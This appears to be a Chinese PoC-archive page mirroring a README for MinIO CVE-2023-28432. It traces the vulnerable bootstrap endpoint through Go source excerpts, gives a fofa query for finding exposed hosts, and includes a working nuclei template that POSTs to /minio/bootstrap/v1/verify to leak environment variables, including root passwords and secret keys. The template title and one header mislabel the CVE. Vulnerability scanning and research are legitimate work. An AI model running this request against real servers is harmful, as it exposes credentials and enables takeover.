关联漏洞
标题:
MinIO 信息泄露漏洞
(CVE-2023-28432)
描述:MinIO是美国MinIO公司的一款开源的对象存储服务器。该产品支持构建用于机器学习、分析和应用程序数据工作负载的基础架构。 MinIO 存在信息泄露漏洞,该漏洞源于在集群部署中MinIO会返回所有环境变量,导致信息泄露。
描述
CVE-2023-28434 nuclei templates
介绍
# CVE-2023-28432
CVE-2023-28432 nuclei templates
## Dec
> Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
## vuln info
```golang
# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L197
// Verify - fetches system server config.
func (client *bootstrapRESTClient) Verify(ctx context.Context, srcCfg ServerSystemConfig) (err error) {
if newObjectLayerFn() != nil {
return nil
}
respBody, err := client.callWithContext(ctx, bootstrapRESTMethodVerify, nil, nil, -1)
if err != nil {
return
}
defer xhttp.DrainBody(respBody)
recvCfg := ServerSystemConfig{}
if err = json.NewDecoder(respBody).Decode(&recvCfg); err != nil {
return err
}
return srcCfg.Diff(recvCfg)
}
# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L54
const (
bootstrapRESTVersion = "v1"
bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion
bootstrapRESTPrefix = minioReservedBucketPath + "/bootstrap"
bootstrapRESTPath = bootstrapRESTPrefix + bootstrapRESTVersionPrefix
)
const (
bootstrapRESTMethodHealth = "/health"
bootstrapRESTMethodVerify = "/verify"
)
// To abstract a node over network.
type bootstrapRESTServer struct{}
// ServerSystemConfig - captures information about server configuration.
type ServerSystemConfig struct {
MinioEndpoints EndpointServerPools
MinioEnv map[string]string
}
# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L149
func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {
ctx := newContext(r, w, "VerifyHandler")
if err := storageServerRequestValidate(r); err != nil {
b.writeErrorResponse(w, err)
return
}
cfg := getServerSystemCfg()
logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))
}
// registerBootstrapRESTHandlers - register bootstrap rest router.
func registerBootstrapRESTHandlers(router *mux.Router) {
server := &bootstrapRESTServer{}
subrouter := router.PathPrefix(bootstrapRESTPrefix).Subrouter()
subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodHealth).HandlerFunc(
httpTraceHdrs(server.HealthHandler))
subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify).HandlerFunc(
httpTraceHdrs(server.VerifyHandler))
}
# https://github.com/minio/minio/blob/master/cmd/object-api-utils.go#L210
// SlashSeparator - slash separator.
const SlashSeparator = "/"
https://github.com/minio/minio/blob/master/cmd/generic-handlers.go#L138
const (
minioReservedBucket = "minio"
minioReservedBucketPath = SlashSeparator + minioReservedBucket
minioReservedBucketPathWithSlash = SlashSeparator + minioReservedBucket + SlashSeparator
SlashSeparator = "/"
minioReservedBucketPath = SlashSeparator + minioReservedBucket ==> /minio
bootstrapRESTPrefix = minioReservedBucketPath + "/bootstrap" ==> /minio/bootstrap/
bootstrapRESTVersion = "v1"
bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion ==> /v1
bootstrapRESTMethodVerify = "/verify"
subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify) ==> /v1/verify/
final path:
/minio/bootstrap/v1/verify/
```
## fofa
> app="minio"
## EXP
```yaml
id: CVE-2023-28432
info:
name: Minio post policy request security bypass
author: Mr-xn
severity: high
description: Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
reference:
- https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
- https://github.com/minio/minio/pull/16853/files
- https://github.com/golang/vulndb/issues/1667
- https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-28432
cwe-id: CWE-200
tags: cve,cve2023,
requests:
- raw:
- |+
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"MinioEndpoints"'
- type: word
part: header
words:
- 'Content-Type: text/plain'
- type: status
status:
- 200
```
## nuclei
> nuclei -v -t /path/to/CVE-2023-28432.yaml -u http://target.com:port
## reference:
- https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
- https://github.com/minio/minio/pull/16853/files
- https://github.com/golang/vulndb/issues/1667
- https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
文件快照
[4.0K] /data/pocs/2e38211ef10116b82b5fa3cadf58a4570dd50f96
├── [1.1K] LICENSE
└── [5.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。